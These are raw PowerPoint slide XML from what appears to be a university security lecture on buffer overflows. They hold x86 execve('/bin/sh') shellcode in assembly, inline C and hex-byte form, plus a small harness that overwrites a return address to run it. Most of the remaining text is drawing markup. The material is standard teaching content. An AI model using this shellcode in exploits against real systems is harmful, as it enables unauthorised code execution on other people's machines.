              <a:gd name="T7" fmla="*/ 0 h 1200"/>
              <a:gd name="T8" fmla="*/ 2133600 w 1056"/>
              <a:gd name="T9" fmla="*/ 731520 h 1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56"/>
              <a:gd name="T16" fmla="*/ 0 h 1200"/>
              <a:gd name="T17" fmla="*/ 1056 w 1056"/>
              <a:gd name="T18" fmla="*/ 1200 h 1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56" h="1200">
                <a:moveTo>
                  <a:pt x="1056" y="1200"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="480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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode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3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start: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mcall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 pop    %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		  //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holds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str_addr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$0x0, %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%al,0x7(%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      // null terminator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%ebx,0x8(%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     // put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str_addr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at AAAA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%eax,0xc(%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     // put 0000 at BBBB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$0xb,%eax          // kernel code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execve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lea    0x8(%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),%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ecx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//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to array of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ptrs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lea    0xc(%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),%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edx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//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to 0000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$0x80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mcall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 call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ajmp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str_addr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 “/bin/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shxAAAABBBB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pPr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83741" y="5342965"/>
            <a:ext cx="3708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AAAABBBB only for illustrative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>purposes; not needed in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>but the memory has to be available to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be overwritten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Overflows (cont)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This topic is highly technical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We assume you’ve had a course in assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or you have x86 assembly experience somehow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The book helps get you up to speed if not, but if you’re seeing assembly for the first time right now, that’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>baaaad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A lot of this is in the book but also all over the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should have also used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I know that everyone who took CSCI 2400 here is a master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inline.c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main() {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"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mcall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   \n\t"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ajmp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 pop    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    \n\t"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"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$0x0, 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\n\t"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"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%al,0x7(%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 \n\t"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"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%ebx,0x8(%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\n\t"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"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%eax,0xc(%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\n\t"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"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$0xb,%eax      \n\t"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"       lea    0x8(%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ecx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\n\t"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"       lea    0xc(%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edx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\n\t"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"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$0x80          \n\t"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mcall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call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ajmp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    \n\t"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"       .string \"/bin/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\""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9482" y="1909482"/>
            <a:ext cx="2773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assembler will automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/call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dataseg.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into .data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120170"/>
            <a:ext cx="8153400" cy="4495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char sc[] =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"\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xeb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\x1c\x5b\xb8\x00\x00\x00\x00\x88\x43\x07\x89\x5b\x08\x89\x43"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"\x0c\xb8\x0b\x00\x00\x00\x8d\x4b\x08\x8d\x53\x0c\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xcd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\x80\xe8\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xdf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"\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xff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xff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xff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xAAAABBBB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main() {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*ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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ret =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*)&amp;ret+2;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*ret =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)sc;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dataseg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sh4.2 $</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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3717" y="1604699"/>
            <a:ext cx="6338047" cy="646331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x/80xb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the inline code to get the bytes for sc[] here, or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objdump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–d |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–A40 main.: | less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33483" y="4114813"/>
            <a:ext cx="5439694" cy="923330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 have to include the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xAAAABBBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> this time; the memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>wouldn’t be allocated otherwise, and this causes the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to fail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34235" y="2420466"/>
            <a:ext cx="3373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disassemble all sections, even data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rot="10800000">
            <a:off x="2510119" y="2169460"/>
            <a:ext cx="224117" cy="4356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EC022-F523-D940-B794-DBA2E298A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7EFDF88-9FAA-2042-A18B-4A4BEF69AA4A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2749657" y="5201955"/>
              <a:ext cx="2821320" cy="132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7EFDF88-9FAA-2042-A18B-4A4BEF69AA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40657" y="5193315"/>
                <a:ext cx="283896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13E6B50-249C-1343-822B-18DFB649BE84}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2557057" y="3848355"/>
              <a:ext cx="2792880" cy="1155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13E6B50-249C-1343-822B-18DFB649BE8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48417" y="3839715"/>
                <a:ext cx="281052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313BB864-16EE-6246-A435-084AAD0F6489}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2484337" y="3319875"/>
              <a:ext cx="2781720" cy="1544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313BB864-16EE-6246-A435-084AAD0F648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75697" y="3310875"/>
                <a:ext cx="279936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6FFFAD49-30FF-4F4A-9812-B2CFBC05C69B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3727057" y="4358115"/>
              <a:ext cx="864720" cy="42480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6FFFAD49-30FF-4F4A-9812-B2CFBC05C69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18057" y="4349115"/>
                <a:ext cx="882360" cy="44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C783B1A9-4C09-0145-AA16-387978C395F1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2330617" y="4117635"/>
              <a:ext cx="324360" cy="27252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C783B1A9-4C09-0145-AA16-387978C395F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21977" y="4108995"/>
                <a:ext cx="34200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12F08437-5605-6C4F-8341-92F2297F17CC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3625537" y="3957795"/>
              <a:ext cx="773280" cy="51084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12F08437-5605-6C4F-8341-92F2297F17C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16897" y="3949155"/>
                <a:ext cx="790920" cy="52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6" name="Group 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75CEBC7-599B-6643-A4D7-2FAE5E8D4C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="312097" y="3250035"/>
            <a:ext cx="6739200" cy="3195720"/>
            <a:chOff x="312097" y="3250035"/>
            <a:chExt cx="6739200" cy="319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C4939FB-EBD5-2542-A60D-B9926D9B83DD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3558217" y="4986675"/>
                <a:ext cx="135720" cy="1206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C4939FB-EBD5-2542-A60D-B9926D9B83D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49577" y="4978035"/>
                  <a:ext cx="1533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0497204-B918-2B4A-B7E5-EA7F3EE85934}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3721657" y="5015115"/>
                <a:ext cx="117720" cy="48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0497204-B918-2B4A-B7E5-EA7F3EE8593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12657" y="5006115"/>
                  <a:ext cx="1353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9DE228E-0E97-714A-8CC0-83800912537E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3857737" y="5015115"/>
                <a:ext cx="370800" cy="407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9DE228E-0E97-714A-8CC0-83800912537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848737" y="5006115"/>
                  <a:ext cx="38844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55C3FC4-0E2C-4D4B-A112-F3ABDD789703}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4184257" y="5043555"/>
                <a:ext cx="230040" cy="180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55C3FC4-0E2C-4D4B-A112-F3ABDD78970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75257" y="5034555"/>
                  <a:ext cx="2476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A69A600-CB06-EB4C-9F2D-D1E4F1D7C127}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2759377" y="5494995"/>
                <a:ext cx="2774520" cy="1328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A69A600-CB06-EB4C-9F2D-D1E4F1D7C12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750737" y="5486355"/>
                  <a:ext cx="27921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8BFA4AA-DA86-8043-8815-E717228AF33D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3582697" y="5359275"/>
                <a:ext cx="776160" cy="356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8BFA4AA-DA86-8043-8815-E717228AF33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574057" y="5350275"/>
                  <a:ext cx="79380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5AA8A34-CB5E-1848-AA57-DD84AF208DB2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4358857" y="5252715"/>
                <a:ext cx="127800" cy="1872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5AA8A34-CB5E-1848-AA57-DD84AF208DB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349857" y="5243715"/>
                  <a:ext cx="1454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0CD740E-07F9-CA4B-88FA-B97435BC22C8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2769817" y="5913315"/>
                <a:ext cx="2791800" cy="979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0CD740E-07F9-CA4B-88FA-B97435BC22C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60817" y="5904315"/>
                  <a:ext cx="28094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82BF98F-9212-C747-9DC9-7EED1C8C4D36}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3604297" y="5808195"/>
                <a:ext cx="217440" cy="155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82BF98F-9212-C747-9DC9-7EED1C8C4D3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595297" y="5799555"/>
                  <a:ext cx="2350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160F5AC-0429-CF4E-9F9C-46A275AF9CC5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3821377" y="5795595"/>
                <a:ext cx="97920" cy="124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160F5AC-0429-CF4E-9F9C-46A275AF9CC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812377" y="5786955"/>
                  <a:ext cx="1155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763061F-2DB7-4849-8BF2-B3172DD9F352}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3996697" y="5690835"/>
                <a:ext cx="86760" cy="163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763061F-2DB7-4849-8BF2-B3172DD9F35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987697" y="5682195"/>
                  <a:ext cx="1044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F306428-4BD2-B648-BB79-881321D1C36F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4184617" y="5777595"/>
                <a:ext cx="360" cy="1501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F306428-4BD2-B648-BB79-881321D1C36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175977" y="5768595"/>
                  <a:ext cx="180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66A9541-271A-774C-9AA2-822DF064B10C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4170937" y="5724315"/>
                <a:ext cx="192240" cy="1699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66A9541-271A-774C-9AA2-822DF064B10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161937" y="5715315"/>
                  <a:ext cx="2098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6717949-64CA-144C-B078-83CAC3446AEB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2568937" y="4301595"/>
                <a:ext cx="2897280" cy="94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6717949-64CA-144C-B078-83CAC3446AE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560297" y="4292595"/>
                  <a:ext cx="29149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FAACE23-84BE-BA4C-8281-39A5E8F14ADE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2674057" y="4706595"/>
                <a:ext cx="2881440" cy="1245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FAACE23-84BE-BA4C-8281-39A5E8F14AD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665057" y="4697955"/>
                  <a:ext cx="28990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AC0E996-C33F-AD4F-BEF0-ADBAAC4F849F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3765217" y="4443435"/>
                <a:ext cx="126000" cy="1386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AC0E996-C33F-AD4F-BEF0-ADBAAC4F849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756217" y="4434795"/>
                  <a:ext cx="1436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7F99419-E89B-FC40-90E9-0B9A36E779A6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3875017" y="4507515"/>
                <a:ext cx="181080" cy="1440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7F99419-E89B-FC40-90E9-0B9A36E779A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866377" y="4498875"/>
                  <a:ext cx="1987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3A89AB5-DB29-C542-A623-DF7147CF8A4C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4096777" y="4398795"/>
                <a:ext cx="151560" cy="214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3A89AB5-DB29-C542-A623-DF7147CF8A4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087777" y="4390155"/>
                  <a:ext cx="1692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A369DA7-EADB-1D48-9660-CDAC3EC86CAE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4049977" y="4517595"/>
                <a:ext cx="15012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A369DA7-EADB-1D48-9660-CDAC3EC86CA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040977" y="4508955"/>
                  <a:ext cx="167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7611087-16A2-3F47-8914-EB72092447BE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3550297" y="4018995"/>
                <a:ext cx="231480" cy="284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7611087-16A2-3F47-8914-EB72092447B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541657" y="4010355"/>
                  <a:ext cx="24912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2E47431-1BE5-6E4B-B4C8-FAF5E8E9CC1E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3865657" y="3985875"/>
                <a:ext cx="132480" cy="2829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2E47431-1BE5-6E4B-B4C8-FAF5E8E9CC1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856657" y="3976875"/>
                  <a:ext cx="15012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D861A26-43C7-F543-A154-8B5629F6C260}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3809137" y="4154715"/>
                <a:ext cx="165960" cy="385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D861A26-43C7-F543-A154-8B5629F6C26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800137" y="4145715"/>
                  <a:ext cx="1836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B5974C0-F0E6-7D48-8508-E4D5F7BF6830}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4102177" y="4159035"/>
                <a:ext cx="42840" cy="2088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B5974C0-F0E6-7D48-8508-E4D5F7BF683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093177" y="4150395"/>
                  <a:ext cx="604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1C88C97-DB8A-FE44-9DCB-5406C9BE88F3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4088497" y="4108635"/>
                <a:ext cx="135360" cy="120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1C88C97-DB8A-FE44-9DCB-5406C9BE88F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079497" y="4099995"/>
                  <a:ext cx="1530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DEFF524-6E05-A045-B4E5-1D797DB7AB2E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5496457" y="4531635"/>
                <a:ext cx="92664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DEFF524-6E05-A045-B4E5-1D797DB7AB2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487457" y="4522635"/>
                  <a:ext cx="944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0F47156-F687-704C-B6F0-B873BD3739F8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5508337" y="4480875"/>
                <a:ext cx="217440" cy="171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0F47156-F687-704C-B6F0-B873BD3739F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499697" y="4472235"/>
                  <a:ext cx="2350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D32579A-65B2-474B-9F84-21E47BC8269B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6513457" y="4421115"/>
                <a:ext cx="360" cy="2595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D32579A-65B2-474B-9F84-21E47BC8269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504457" y="4412115"/>
                  <a:ext cx="1800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30E3DD5-9713-7441-943A-04D1E7E3A2D5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6605257" y="4445595"/>
                <a:ext cx="268560" cy="2048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30E3DD5-9713-7441-943A-04D1E7E3A2D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596617" y="4436595"/>
                  <a:ext cx="2862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1A7078A-7478-104B-8BD0-7BBFEC1E3D4C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6824857" y="4437315"/>
                <a:ext cx="226440" cy="2239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1A7078A-7478-104B-8BD0-7BBFEC1E3D4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815857" y="4428675"/>
                  <a:ext cx="2440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EFCAA29-0D4C-2C42-8C04-76C389D45351}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3928657" y="4310955"/>
                <a:ext cx="505800" cy="3920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EFCAA29-0D4C-2C42-8C04-76C389D4535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920017" y="4302315"/>
                  <a:ext cx="52344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D8AE27F-FEA6-584F-AABC-FA2903413064}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3698617" y="4468635"/>
                <a:ext cx="760680" cy="4921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D8AE27F-FEA6-584F-AABC-FA290341306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689977" y="4459635"/>
                  <a:ext cx="77832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752F963-E691-F141-91F7-C951FF309836}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4691857" y="4585635"/>
                <a:ext cx="241200" cy="1576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752F963-E691-F141-91F7-C951FF30983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683217" y="4576635"/>
                  <a:ext cx="2588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AE4CD32-EBBF-3047-A80B-77B22694682E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5010457" y="4620555"/>
                <a:ext cx="208800" cy="1486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AE4CD32-EBBF-3047-A80B-77B22694682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001817" y="4611555"/>
                  <a:ext cx="2264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B8EBF01-D3D4-CD4F-8252-8E9FFF07EBE4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1055857" y="4136715"/>
                <a:ext cx="1462320" cy="795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B8EBF01-D3D4-CD4F-8252-8E9FFF07EBE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46857" y="4128075"/>
                  <a:ext cx="14799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7CA9C72-44FF-7A49-84D3-2C657BECAA79}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2317657" y="4125195"/>
                <a:ext cx="258840" cy="2084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7CA9C72-44FF-7A49-84D3-2C657BECAA7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308657" y="4116195"/>
                  <a:ext cx="2764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B826D89-BBBD-BD47-A8B1-036B827CE586}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="312097" y="4156875"/>
                <a:ext cx="219600" cy="187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B826D89-BBBD-BD47-A8B1-036B827CE58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03097" y="4148235"/>
                  <a:ext cx="2372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36081E3-207C-634A-A568-FB12F08A91D9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="392377" y="4153995"/>
                <a:ext cx="60480" cy="1270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36081E3-207C-634A-A568-FB12F08A91D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83737" y="4145355"/>
                  <a:ext cx="781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5887EBE-FC9F-0540-A899-2965ACBC4970}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="471937" y="4036635"/>
                <a:ext cx="14400" cy="2890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5887EBE-FC9F-0540-A899-2965ACBC497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62937" y="4027635"/>
                  <a:ext cx="3204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6F2EADF-7ABD-1246-85DC-2D0F4822CA86}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="466897" y="4135635"/>
                <a:ext cx="149760" cy="121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6F2EADF-7ABD-1246-85DC-2D0F4822CA8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58257" y="4126995"/>
                  <a:ext cx="1674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448386D-7E9F-A14D-811D-B47B902084A9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="694057" y="4180275"/>
                <a:ext cx="360" cy="2138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448386D-7E9F-A14D-811D-B47B902084A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85417" y="4171635"/>
                  <a:ext cx="180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ECB5F20-FB63-304F-9974-271256D2F5F3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="688297" y="4108995"/>
                <a:ext cx="141840" cy="1440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ECB5F20-FB63-304F-9974-271256D2F5F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79297" y="4099995"/>
                  <a:ext cx="1594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73EA08C-7858-6B49-B3C5-5033E0B765DF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1421977" y="4474035"/>
                <a:ext cx="1241640" cy="2343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73EA08C-7858-6B49-B3C5-5033E0B765D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412977" y="4465395"/>
                  <a:ext cx="125928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2115D43-D534-084C-86B8-5B9EB9560398}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2396857" y="4408515"/>
                <a:ext cx="338040" cy="2271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2115D43-D534-084C-86B8-5B9EB956039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388217" y="4399515"/>
                  <a:ext cx="3556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984EA96-1AD0-2E4C-8486-A8C08219E9DB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="844177" y="4832595"/>
                <a:ext cx="145080" cy="2570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984EA96-1AD0-2E4C-8486-A8C08219E9D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35537" y="4823955"/>
                  <a:ext cx="16272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839B9B9-D1E3-324B-9745-6FEEEF38E003}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1037497" y="4876155"/>
                <a:ext cx="174240" cy="2214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839B9B9-D1E3-324B-9745-6FEEEF38E00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28497" y="4867155"/>
                  <a:ext cx="19188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7C597D2-4303-2145-B571-F9C5088B0032}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1331977" y="4982715"/>
                <a:ext cx="10080" cy="3560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7C597D2-4303-2145-B571-F9C5088B003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322977" y="4973715"/>
                  <a:ext cx="2772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AE673A3-967A-B140-B825-15FC0B8885C8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1303897" y="4864635"/>
                <a:ext cx="186480" cy="1634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7AE673A3-967A-B140-B825-15FC0B8885C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294897" y="4855635"/>
                  <a:ext cx="2041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255ACB2-60BC-E542-9CB3-5BA6353822C8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2523577" y="3250035"/>
                <a:ext cx="488160" cy="31957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255ACB2-60BC-E542-9CB3-5BA6353822C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514577" y="3241035"/>
                  <a:ext cx="505800" cy="32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F57490F-6450-FD4F-93AA-A8F92CB0C365}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5444257" y="3740355"/>
                <a:ext cx="349200" cy="22928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F57490F-6450-FD4F-93AA-A8F92CB0C36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435257" y="3731355"/>
                  <a:ext cx="366840" cy="23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83D488A-B4AA-2A49-BA94-1FC23CAB7DC5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4652977" y="4449555"/>
                <a:ext cx="764640" cy="3859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83D488A-B4AA-2A49-BA94-1FC23CAB7DC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643977" y="4440915"/>
